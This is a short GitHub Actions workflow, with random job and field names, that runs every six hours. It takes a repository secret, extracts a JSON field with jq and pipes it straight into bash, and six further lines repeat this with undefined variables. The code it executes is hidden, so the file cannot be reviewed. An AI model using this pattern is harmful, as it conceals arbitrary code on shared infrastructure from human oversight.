name: fanjiaoqingyi

on:
  workflow_dispatch:
  schedule:
    - cron: '52 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanjiaoqingyi
        env:
          alb6: ${{ secrets.alb6 }}
        run: |
          echo $alb6 | jq -r .prz2962 | /bin/bash
          echo $xpykm395 | jq -r .na86021 | /bin/bash
          echo $io4 | jq -r .cohj5 | /bin/bash
          echo $zpcze08 | jq -r .mpo4 | /bin/bash
          echo $wblm1 | jq -r .rm5745 | /bin/bash
          echo $m2567 | jq -r .g4710 | /bin/bash
          echo $sel56688 | jq -r .itha30 | /bin/bash

